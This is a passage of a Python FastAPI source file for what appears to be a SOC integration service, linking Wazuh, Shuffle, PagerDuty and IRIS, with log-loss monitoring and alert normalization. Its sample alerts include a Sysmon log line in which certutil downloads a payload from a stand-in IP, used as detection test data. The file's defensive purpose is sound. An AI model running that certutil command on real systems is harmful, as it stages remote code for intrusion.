Нет описания

main.py 82KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821831841851861871881891901911921931941951961971981992002012022032042052062072082092102112122132142152162172182192202212222232242252262272282292302312322332342352362372382392402412422432442452462472482492502512522532542552562572582592602612622632642652662672682692702712722732742752762772782792802812822832842852862872882892902912922932942952962972982993003013023033043053063073083093103113123133143153163173183193203213223233243253263273283293303313323333343353363373383393403413423433443453463473483493503513523533543553563573583593603613623633643653663673683693703713723733743753763773783793803813823833843853863873883893903913923933943953963973983994004014024034044054064074084094104114124134144154164174184194204214224234244254264274284294304314324334344354364374384394404414424434444454464474484494504514524534544554564574584594604614624634644654664674684694704714724734744754764774784794804814824834844854864874884894904914924934944954964974984995005015025035045055065075085095105115125135145155165175185195205215225235245255265275285295305315325335345355365375385395405415425435445455465475485495505515525535545555565575585595605615625635645655665675685695705715725735745755765775785795805815825835845855865875885895905915925935945955965975985996006016026036046056066076086096106116126136146156166176186196206216226236246256266276286296306316326336346356366376386396406416426436446456466476486496506516526536546556566576586596606616626636646656666676686696706716726736746756766776786796806816826836846856866876886896906916926936946956966976986997007017027037047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069107010711072107310741075107610771078107910801081108210831084108510861087108810891090109110921093109410951096109710981099110011011102110311041105110611071108110911101111111211131114111511161117111811191120112111221123112411251126112711281129113011311132113311341135113611371138113911401141114211431144114511461147114811491150115111521153115411551156115711581159116011611162116311641165116611671168116911701171117211731174117511761177117811791180118111821183118411851186118711881189119011911192119311941195119611971198119912001201120212031204120512061207120812091210121112121213121412151216121712181219122012211222122312241225122612271228122912301231123212331234123512361237123812391240124112421243124412451246124712481249125012511252125312541255125612571258125912601261126212631264126512661267126812691270127112721273127412751276127712781279128012811282128312841285128612871288128912901291129212931294129512961297129812991300130113021303130413051306130713081309131013111312131313141315131613171318131913201321132213231324132513261327132813291330133113321333133413351336133713381339134013411342134313441345134613471348134913501351135213531354135513561357135813591360136113621363136413651366136713681369137013711372137313741375137613771378137913801381138213831384138513861387138813891390139113921393139413951396139713981399140014011402140314041405140614071408140914101411141214131414141514161417141814191420142114221423142414251426142714281429143014311432143314341435143614371438143914401441144214431444144514461447144814491450145114521453145414551456145714581459146014611462146314641465146614671468146914701471147214731474147514761477147814791480148114821483148414851486148714881489149014911492149314941495149614971498149915001501150215031504150515061507150815091510151115121513151415151516151715181519152015211522152315241525152615271528152915301531153215331534153515361537153815391540154115421543154415451546154715481549155015511552155315541555155615571558155915601561156215631564156515661567156815691570157115721573157415751576157715781579158015811582158315841585158615871588158915901591159215931594159515961597159815991600160116021603160416051606160716081609161016111612161316141615161616171618161916201621162216231624162516261627162816291630163116321633163416351636163716381639164016411642164316441645164616471648164916501651165216531654165516561657165816591660166116621663166416651666166716681669167016711672167316741675167616771678167916801681168216831684168516861687168816891690169116921693169416951696169716981699170017011702170317041705170617071708170917101711171217131714171517161717171817191720172117221723172417251726172717281729173017311732173317341735173617371738173917401741174217431744174517461747174817491750175117521753175417551756175717581759176017611762176317641765176617671768176917701771177217731774177517761777177817791780178117821783178417851786178717881789179017911792179317941795179617971798179918001801180218031804180518061807180818091810181118121813181418151816181718181819182018211822182318241825182618271828182918301831183218331834183518361837183818391840184118421843184418451846184718481849185018511852185318541855185618571858185918601861186218631864186518661867186818691870187118721873187418751876187718781879188018811882188318841885188618871888188918901891189218931894189518961897189818991900190119021903190419051906190719081909191019111912191319141915191619171918191919201921192219231924192519261927192819291930193119321933193419351936193719381939194019411942194319441945194619471948194919501951195219531954195519561957195819591960196119621963196419651966196719681969197019711972197319741975197619771978197919801981198219831984198519861987198819891990199119921993199419951996199719981999200020012002200320042005200620072008200920102011201220132014201520162017201820192020202120222023202420252026202720282029203020312032203320342035203620372038203920402041204220432044204520462047204820492050205120522053205420552056205720582059206020612062206320642065206620672068206920702071207220732074207520762077207820792080208120822083208420852086208720882089209020912092209320942095209620972098209921002101210221032104210521062107210821092110211121122113211421152116211721182119212021212122212321242125212621272128212921302131213221332134213521362137213821392140214121422143214421452146214721482149215021512152215321542155215621572158215921602161216221632164216521662167216821692170217121722173217421752176217721782179218021812182218321842185218621872188218921902191219221932194219521962197219821992200220122022203220422052206220722082209221022112212221322142215221622172218221922202221222222232224222522262227222822292230223122322233223422352236223722382239224022412242224322442245224622472248224922502251225222532254225522562257225822592260226122622263226422652266226722682269227022712272227322742275227622772278227922802281228222832284228522862287228822892290229122922293229422952296229722982299230023012302
  1. import asyncio
  2. import logging
  3. import os
  4. import re
  5. import shlex
  6. import subprocess
  7. import uuid
  8. from collections import deque
  9. from datetime import datetime, timedelta, timezone
  10. from pathlib import Path
  11. from psycopg import sql
  12. from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
  13. from fastapi.responses import FileResponse, Response
  14. from fastapi.staticfiles import StaticFiles
  15. from app.adapters.abuseipdb import AbuseIpdbAdapter
  16. from app.adapters.geoip import GeoIpAdapter
  17. from app.adapters.iris import IrisAdapter
  18. from app.adapters.pagerduty import PagerDutyAdapter
  19. from app.adapters.shuffle import ShuffleAdapter
  20. from app.adapters.virustotal import VirusTotalAdapter
  21. from app.adapters.wazuh import WazuhAdapter
  22. from app.config import settings
  23. from app.db import get_conn, init_schema
  24. from app.models import (
  25. ActionCreateIncidentRequest,
  26. ApiResponse,
  27. CDetectionEvaluateRequest,
  28. IocEnrichRequest,
  29. IocEvaluateRequest,
  30. IrisTicketCreateRequest,
  31. LogLossCheckRequest,
  32. LogLossStreamCheck,
  33. SimLogRunRequest,
  34. ShuffleLoginRequest,
  35. ShuffleProxyRequest,
  36. TriggerShuffleRequest,
  37. WazuhIngestRequest,
  38. )
  39. from app.repositories.mvp_repo import MvpRepository
  40. from app.routes.mvp import build_mvp_router
  41. from app.security import require_internal_api_key
  42. from app.services.mvp_service import MvpService
  43. from app.services.c_detection_service import CDetectionService
  44. app = FastAPI(title=settings.app_name, version="0.1.0")
  45. logger = logging.getLogger(__name__)
  46. UI_DIR = Path(__file__).resolve().parent / "ui"
  47. UI_ASSETS_DIR = UI_DIR / "assets"
  48. SIM_SCRIPTS_DIR = Path("/app/scripts")
  49. SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs")
  50. wazuh_adapter = WazuhAdapter(
  51. base_url=settings.wazuh_base_url,
  52. username=settings.wazuh_username,
  53. password=settings.wazuh_password,
  54. indexer_url=settings.wazuh_indexer_url,
  55. indexer_username=settings.wazuh_indexer_username,
  56. indexer_password=settings.wazuh_indexer_password,
  57. )
  58. shuffle_adapter = ShuffleAdapter(
  59. base_url=settings.shuffle_base_url,
  60. api_key=settings.shuffle_api_key,
  61. )
  62. pagerduty_adapter = PagerDutyAdapter(
  63. base_url=settings.pagerduty_base_url,
  64. api_key=settings.pagerduty_api_key,
  65. )
  66. iris_adapter = IrisAdapter(
  67. base_url=settings.iris_base_url,
  68. api_key=settings.iris_api_key,
  69. )
  70. virustotal_adapter = VirusTotalAdapter(
  71. base_url=settings.virustotal_base_url,
  72. api_key=settings.virustotal_api_key,
  73. )
  74. abuseipdb_adapter = AbuseIpdbAdapter(
  75. base_url=settings.abuseipdb_base_url,
  76. api_key=settings.abuseipdb_api_key,
  77. )
  78. geoip_adapter = GeoIpAdapter(
  79. provider=settings.geoip_provider,
  80. cache_ttl_seconds=settings.geoip_cache_ttl_seconds,
  81. )
  82. repo = MvpRepository()
  83. mvp_service = MvpService(
  84. repo=repo,
  85. wazuh_adapter=wazuh_adapter,
  86. shuffle_adapter=shuffle_adapter,
  87. iris_adapter=iris_adapter,
  88. pagerduty_adapter=pagerduty_adapter,
  89. )
  90. c_detection_service = CDetectionService(
  91. repo=repo,
  92. geoip_adapter=geoip_adapter,
  93. )
  94. app.include_router(build_mvp_router(mvp_service, require_internal_api_key))
  95. app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets")
  96. @app.middleware("http")
  97. async def ui_no_cache_middleware(request: Request, call_next):
  98. response: Response = await call_next(request)
  99. if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"):
  100. response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
  101. response.headers["Pragma"] = "no-cache"
  102. response.headers["Expires"] = "0"
  103. return response
  104. DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [
  105. {
  106. "name": "fortigate",
  107. "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E",
  108. "min_count": 1,
  109. },
  110. {
  111. "name": "windows_agent",
  112. "query": "full_log:windows_agent OR full_log:windows",
  113. "min_count": 1,
  114. },
  115. {
  116. "name": "vmware",
  117. "query": "full_log:vmware",
  118. "min_count": 1,
  119. },
  120. {
  121. "name": "log_monitor",
  122. "query": "full_log:log_monitor OR rule.id:100411",
  123. "min_count": 1,
  124. },
  125. ]
  126. async def _execute_log_loss_check(
  127. req: LogLossCheckRequest,
  128. create_ticket: bool,
  129. ) -> dict[str, object]:
  130. minutes = max(1, int(req.minutes))
  131. streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS]
  132. items: list[dict[str, object]] = []
  133. loss_count = 0
  134. error_count = 0
  135. loss_stream_names: list[str] = []
  136. for stream in streams:
  137. min_count = max(0, int(stream.min_count))
  138. try:
  139. observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes)
  140. is_loss = observed < min_count
  141. if is_loss:
  142. loss_count += 1
  143. loss_stream_names.append(stream.name)
  144. items.append(
  145. {
  146. "name": stream.name,
  147. "query": stream.query,
  148. "minutes": minutes,
  149. "min_count": min_count,
  150. "observed_count": observed,
  151. "status": "loss" if is_loss else "ok",
  152. }
  153. )
  154. except Exception as exc:
  155. error_count += 1
  156. items.append(
  157. {
  158. "name": stream.name,
  159. "query": stream.query,
  160. "minutes": minutes,
  161. "min_count": min_count,
  162. "observed_count": None,
  163. "status": "error",
  164. "error": str(exc),
  165. }
  166. )
  167. summary = {
  168. "total_streams": len(items),
  169. "loss_streams": loss_count,
  170. "error_streams": error_count,
  171. "all_ok": loss_count == 0 and error_count == 0,
  172. }
  173. ticket_data: dict[str, object] | None = None
  174. if create_ticket and loss_count > 0:
  175. cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds))
  176. now_ts = datetime.now(timezone.utc).timestamp()
  177. state = app.state.log_loss_monitor_state
  178. last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0)
  179. in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown
  180. if not in_cooldown:
  181. title = f"Log loss detected ({loss_count} stream(s))"
  182. description = (
  183. f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). "
  184. f"Affected streams: {', '.join(loss_stream_names)}."
  185. )
  186. case_payload = {
  187. "case_name": title,
  188. "case_description": description,
  189. "case_customer": settings.iris_default_customer_id,
  190. "case_soc_id": settings.iris_default_soc_id,
  191. }
  192. try:
  193. iris_result = await iris_adapter.create_case(case_payload)
  194. state["last_ticket_ts"] = now_ts
  195. ticket_data = {"created": True, "iris": iris_result}
  196. except Exception as exc:
  197. ticket_data = {"created": False, "error": str(exc)}
  198. else:
  199. ticket_data = {
  200. "created": False,
  201. "skipped": "cooldown_active",
  202. "cooldown_seconds": cooldown,
  203. "last_ticket_ts": last_ticket_ts,
  204. }
  205. result: dict[str, object] = {
  206. "checked_at": datetime.now(timezone.utc).isoformat(),
  207. "minutes": minutes,
  208. "summary": summary,
  209. "streams": items,
  210. }
  211. if ticket_data is not None:
  212. result["ticket"] = ticket_data
  213. return result
  214. async def _log_loss_monitor_loop() -> None:
  215. interval = max(5, int(settings.log_loss_monitor_interval_seconds))
  216. while True:
  217. started_at = datetime.now(timezone.utc).isoformat()
  218. try:
  219. app.state.log_loss_monitor_state["running"] = True
  220. app.state.log_loss_monitor_state["last_started_at"] = started_at
  221. req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes)))
  222. result = await _execute_log_loss_check(
  223. req=req,
  224. create_ticket=bool(settings.log_loss_monitor_create_iris_ticket),
  225. )
  226. app.state.log_loss_monitor_state["last_status"] = "ok"
  227. app.state.log_loss_monitor_state["last_result"] = result
  228. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  229. logger.info(
  230. "log-loss monitor checked=%s loss=%s errors=%s",
  231. result.get("summary", {}).get("total_streams", 0),
  232. result.get("summary", {}).get("loss_streams", 0),
  233. result.get("summary", {}).get("error_streams", 0),
  234. )
  235. except Exception as exc:
  236. app.state.log_loss_monitor_state["last_status"] = "error"
  237. app.state.log_loss_monitor_state["last_error"] = str(exc)
  238. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  239. logger.exception("log-loss monitor failed: %s", exc)
  240. finally:
  241. app.state.log_loss_monitor_state["running"] = False
  242. await asyncio.sleep(interval)
  243. async def _wazuh_auto_sync_loop() -> None:
  244. interval = max(5, int(settings.wazuh_auto_sync_interval_seconds))
  245. while True:
  246. started_at = datetime.now(timezone.utc).isoformat()
  247. try:
  248. app.state.wazuh_auto_sync_state["running"] = True
  249. app.state.wazuh_auto_sync_state["last_started_at"] = started_at
  250. result = await mvp_service.sync_wazuh_alerts(
  251. query=settings.wazuh_auto_sync_query,
  252. limit=settings.wazuh_auto_sync_limit,
  253. minutes=settings.wazuh_auto_sync_minutes,
  254. )
  255. app.state.wazuh_auto_sync_state["last_status"] = "ok"
  256. app.state.wazuh_auto_sync_state["last_result"] = result
  257. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  258. logger.info(
  259. "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s",
  260. result.get("processed", 0),
  261. result.get("ingested", 0),
  262. result.get("skipped_existing", 0),
  263. result.get("failed", 0),
  264. result.get("ioc_evaluated", 0),
  265. result.get("ioc_matched", 0),
  266. result.get("ioc_rejected", 0),
  267. )
  268. except Exception as exc:
  269. app.state.wazuh_auto_sync_state["last_status"] = "error"
  270. app.state.wazuh_auto_sync_state["last_error"] = str(exc)
  271. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  272. logger.exception("wazuh auto-sync failed: %s", exc)
  273. finally:
  274. app.state.wazuh_auto_sync_state["running"] = False
  275. await asyncio.sleep(interval)
  276. def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]:
  277. event = dict(match.get("event") or {})
  278. usecase_id = str(match.get("usecase_id") or "C-unknown")
  279. section = str(match.get("section") or "c")
  280. severity = str(match.get("severity") or "medium")
  281. entity = str(match.get("entity") or "unknown")
  282. evidence = dict(match.get("evidence") or {})
  283. source = str(event.get("source") or "wazuh")
  284. timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat())
  285. event_id = str(event.get("event_id") or f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}")
  286. payload = dict(event.get("payload") or {})
  287. asset = dict(event.get("asset") or {})
  288. network = dict(event.get("network") or {})
  289. event_type = "c2_credential_abuse"
  290. if section == "c1":
  291. event_type = "c1_impossible_travel"
  292. elif section == "c3":
  293. event_type = "c3_lateral_movement"
  294. title = f"{usecase_id} detection for {entity}"
  295. description = f"{usecase_id} matched for entity={entity}. evidence={evidence}"
  296. tags = list(event.get("tags") or [])
  297. tags.extend(["appendix_c", usecase_id.lower(), section])
  298. return {
  299. "source": source,
  300. "event_type": event_type,
  301. "event_id": event_id,
  302. "timestamp": timestamp,
  303. "severity": severity,
  304. "title": title,
  305. "description": description,
  306. "asset": asset,
  307. "network": network,
  308. "tags": sorted(set(tags)),
  309. "risk_context": {"appendix_c_usecase": usecase_id},
  310. "raw": event.get("raw") or {},
  311. "payload": payload,
  312. }
  313. @app.on_event("startup")
  314. async def startup() -> None:
  315. init_schema()
  316. repo.ensure_policy()
  317. app.state.wazuh_auto_sync_state = {
  318. "running": False,
  319. "last_status": None,
  320. "last_started_at": None,
  321. "last_finished_at": None,
  322. "last_error": None,
  323. "last_result": None,
  324. }
  325. app.state.log_loss_monitor_state = {
  326. "running": False,
  327. "last_status": None,
  328. "last_started_at": None,
  329. "last_finished_at": None,
  330. "last_error": None,
  331. "last_result": None,
  332. "last_ticket_ts": 0.0,
  333. }
  334. app.state.c_detection_state = {
  335. "last_status": None,
  336. "last_started_at": None,
  337. "last_finished_at": None,
  338. "last_error": None,
  339. "last_result": None,
  340. "last_ticket_ts_by_key": {},
  341. }
  342. app.state.systems_monitor_state = {
  343. "last_ok_at": {},
  344. }
  345. app.state.sim_runs = {}
  346. SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True)
  347. if settings.wazuh_auto_sync_enabled:
  348. app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop())
  349. logger.info(
  350. "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s",
  351. settings.wazuh_auto_sync_interval_seconds,
  352. settings.wazuh_auto_sync_limit,
  353. settings.wazuh_auto_sync_minutes,
  354. settings.wazuh_auto_sync_query,
  355. )
  356. if settings.log_loss_monitor_enabled:
  357. app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop())
  358. logger.info(
  359. "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss",
  360. settings.log_loss_monitor_interval_seconds,
  361. settings.log_loss_monitor_window_minutes,
  362. settings.log_loss_monitor_create_iris_ticket,
  363. settings.log_loss_monitor_ticket_cooldown_seconds,
  364. )
  365. @app.on_event("shutdown")
  366. async def shutdown() -> None:
  367. task = getattr(app.state, "wazuh_auto_sync_task", None)
  368. if task:
  369. task.cancel()
  370. try:
  371. await task
  372. except asyncio.CancelledError:
  373. pass
  374. ll_task = getattr(app.state, "log_loss_monitor_task", None)
  375. if ll_task:
  376. ll_task.cancel()
  377. try:
  378. await ll_task
  379. except asyncio.CancelledError:
  380. pass
  381. sim_runs = getattr(app.state, "sim_runs", {})
  382. for run in sim_runs.values():
  383. process = run.get("process")
  384. if process and process.poll() is None:
  385. process.terminate()
  386. @app.get(
  387. "/ui",
  388. summary="SOC Integrator UI",
  389. description="Serve the built-in Alpine.js operations console.",
  390. include_in_schema=False,
  391. )
  392. async def ui_index() -> FileResponse:
  393. if not UI_DIR.exists():
  394. raise HTTPException(status_code=404, detail="UI is not available in this build")
  395. return FileResponse(UI_DIR / "index.html")
  396. @app.get(
  397. "/health",
  398. response_model=ApiResponse,
  399. summary="Service health",
  400. description="Return soc-integrator service identity and configured upstream targets.",
  401. )
  402. async def health() -> ApiResponse:
  403. return ApiResponse(
  404. data={
  405. "service": settings.app_name,
  406. "env": settings.app_env,
  407. "targets": {
  408. "wazuh": settings.wazuh_base_url,
  409. "shuffle": settings.shuffle_base_url,
  410. "pagerduty": settings.pagerduty_base_url,
  411. "iris": settings.iris_base_url,
  412. },
  413. }
  414. )
  415. def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
  416. src_payload = dict(payload.payload or {})
  417. src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
  418. src_payload.setdefault("id", payload.alert_id)
  419. src_payload.setdefault(
  420. "rule",
  421. {
  422. "id": payload.rule_id or "unknown",
  423. "level": payload.severity if payload.severity is not None else 5,
  424. "description": payload.title or "Wazuh alert",
  425. },
  426. )
  427. return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
  428. def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
  429. normalized = {
  430. "source": payload.source,
  431. "alert_id": payload.alert_id,
  432. "rule_id": payload.rule_id,
  433. "severity": payload.severity,
  434. "title": payload.title,
  435. "payload": payload.payload,
  436. }
  437. hit = _build_wazuh_hit_from_ingest(payload)
  438. normalized_event = mvp_service.normalize_wazuh_hit(hit)
  439. return {
  440. "normalized": normalized,
  441. "normalized_event": normalized_event,
  442. }
  443. @app.post(
  444. "/ingest/wazuh-alert",
  445. response_model=ApiResponse,
  446. summary="Normalize Wazuh alert",
  447. description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
  448. )
  449. async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
  450. return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
  451. @app.get(
  452. "/ingest/wazuh-alert/samples",
  453. response_model=ApiResponse,
  454. summary="Sample normalization cases",
  455. description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
  456. )
  457. async def ingest_wazuh_alert_samples() -> ApiResponse:
  458. sample_payloads = [
  459. WazuhIngestRequest(
  460. source="wazuh",
  461. rule_id="110302",
  462. alert_id="sample-a1-02",
  463. severity=8,
  464. title="A1 production: DNS IOC domain match event",
  465. payload={
  466. "@timestamp": datetime.now(timezone.utc).isoformat(),
  467. "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
  468. "agent": {"name": "dns-fw-01", "id": "001"},
  469. },
  470. ),
  471. WazuhIngestRequest(
  472. source="wazuh",
  473. rule_id="110402",
  474. alert_id="sample-b1-02",
  475. severity=8,
  476. title="B1 production: ESXi SSH enabled",
  477. payload={
  478. "@timestamp": datetime.now(timezone.utc).isoformat(),
  479. "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
  480. "agent": {"name": "esxi-01", "id": "002"},
  481. },
  482. ),
  483. WazuhIngestRequest(
  484. source="wazuh",
  485. rule_id="110426",
  486. alert_id="sample-b3-06",
  487. severity=8,
  488. title="B3 production: CertUtil download pattern",
  489. payload={
  490. "@timestamp": datetime.now(timezone.utc).isoformat(),
  491. "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
  492. "agent": {"name": "win-sysmon-01", "id": "003"},
  493. },
  494. ),
  495. WazuhIngestRequest(
  496. source="wazuh",
  497. rule_id="110501",
  498. alert_id="sample-c1-01",
  499. severity=12,
  500. title="C1 production: Impossible travel",
  501. payload={
  502. "@timestamp": datetime.now(timezone.utc).isoformat(),
  503. "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
  504. "agent": {"name": "fgt-vpn-01", "id": "004"},
  505. },
  506. ),
  507. ]
  508. cases = []
  509. for item in sample_payloads:
  510. cases.append(
  511. {
  512. "name": str(item.alert_id),
  513. "request": item.model_dump(mode="json"),
  514. "result": _normalize_wazuh_ingest_payload(item),
  515. }
  516. )
  517. return ApiResponse(data={"cases": cases, "count": len(cases)})
  518. @app.post(
  519. "/action/create-incident",
  520. response_model=ApiResponse,
  521. summary="Create PagerDuty incident",
  522. description="Create an incident in PagerDuty (stub or real integration) from request payload.",
  523. )
  524. async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse:
  525. incident_payload = {
  526. "title": payload.title,
  527. "urgency": payload.severity,
  528. "incident_key": payload.dedupe_key,
  529. "body": payload.payload,
  530. "source": payload.source,
  531. }
  532. try:
  533. pd_result = await pagerduty_adapter.create_incident(incident_payload)
  534. except Exception as exc:
  535. raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc
  536. return ApiResponse(data={"pagerduty": pd_result})
  537. @app.post(
  538. "/action/trigger-shuffle",
  539. response_model=ApiResponse,
  540. summary="Trigger Shuffle workflow",
  541. description="Execute a Shuffle workflow by ID with execution_argument payload.",
  542. )
  543. async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse:
  544. try:
  545. shuffle_result = await shuffle_adapter.trigger_workflow(
  546. workflow_id=payload.workflow_id,
  547. payload=payload.execution_argument,
  548. )
  549. except Exception as exc:
  550. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  551. return ApiResponse(data={"shuffle": shuffle_result})
  552. @app.get(
  553. "/shuffle/health",
  554. response_model=ApiResponse,
  555. summary="Shuffle health",
  556. description="Check Shuffle backend health endpoint through adapter connectivity.",
  557. )
  558. async def shuffle_health() -> ApiResponse:
  559. try:
  560. result = await shuffle_adapter.health()
  561. except Exception as exc:
  562. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  563. return ApiResponse(data={"shuffle": result})
  564. @app.get(
  565. "/shuffle/auth-test",
  566. response_model=ApiResponse,
  567. summary="Shuffle auth test",
  568. description="Validate Shuffle API key authentication.",
  569. )
  570. async def shuffle_auth_test() -> ApiResponse:
  571. try:
  572. result = await shuffle_adapter.auth_test()
  573. except Exception as exc:
  574. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  575. return ApiResponse(data={"shuffle": result})
  576. @app.post(
  577. "/shuffle/login",
  578. response_model=ApiResponse,
  579. summary="Shuffle login",
  580. description="Login to Shuffle with username/password and return auth response.",
  581. )
  582. async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse:
  583. try:
  584. result = await shuffle_adapter.login(payload.username, payload.password)
  585. except Exception as exc:
  586. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  587. return ApiResponse(data={"shuffle": result})
  588. @app.post(
  589. "/shuffle/generate-apikey",
  590. response_model=ApiResponse,
  591. summary="Generate Shuffle API key",
  592. description="Login using provided or configured credentials and generate a Shuffle API key.",
  593. )
  594. async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse:
  595. username = payload.username if payload else settings.shuffle_username
  596. password = payload.password if payload else settings.shuffle_password
  597. if not username or not password:
  598. raise HTTPException(
  599. status_code=400,
  600. detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.",
  601. )
  602. try:
  603. result = await shuffle_adapter.generate_apikey_from_login(username, password)
  604. except Exception as exc:
  605. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  606. return ApiResponse(data={"shuffle": result})
  607. @app.get(
  608. "/shuffle/workflows",
  609. response_model=ApiResponse,
  610. summary="List Shuffle workflows",
  611. description="List available workflows in Shuffle using configured API key.",
  612. )
  613. async def shuffle_workflows() -> ApiResponse:
  614. try:
  615. result = await shuffle_adapter.list_workflows()
  616. except Exception as exc:
  617. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  618. return ApiResponse(data={"shuffle": result})
  619. @app.get(
  620. "/shuffle/workflows/{workflow_id}",
  621. response_model=ApiResponse,
  622. summary="Get Shuffle workflow",
  623. description="Get a single Shuffle workflow definition by workflow ID.",
  624. )
  625. async def shuffle_workflow(workflow_id: str) -> ApiResponse:
  626. try:
  627. result = await shuffle_adapter.get_workflow(workflow_id)
  628. except Exception as exc:
  629. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  630. return ApiResponse(data={"shuffle": result})
  631. @app.post(
  632. "/shuffle/workflows/{workflow_id}/execute",
  633. response_model=ApiResponse,
  634. summary="Execute Shuffle workflow",
  635. description="Execute a specific Shuffle workflow with custom JSON payload.",
  636. )
  637. async def shuffle_workflow_execute(
  638. workflow_id: str, payload: dict[str, object]
  639. ) -> ApiResponse:
  640. try:
  641. result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload)
  642. except Exception as exc:
  643. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  644. return ApiResponse(data={"shuffle": result})
  645. @app.get(
  646. "/shuffle/apps",
  647. response_model=ApiResponse,
  648. summary="List Shuffle apps",
  649. description="List installed/available Shuffle apps from app API.",
  650. )
  651. async def shuffle_apps() -> ApiResponse:
  652. try:
  653. result = await shuffle_adapter.list_apps()
  654. except Exception as exc:
  655. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  656. return ApiResponse(data={"shuffle": result})
  657. @app.post(
  658. "/shuffle/proxy",
  659. response_model=ApiResponse,
  660. summary="Proxy request to Shuffle API",
  661. description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.",
  662. )
  663. async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse:
  664. path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}"
  665. try:
  666. result = await shuffle_adapter.proxy(
  667. method=payload.method,
  668. path=path,
  669. params=payload.params,
  670. payload=payload.payload,
  671. )
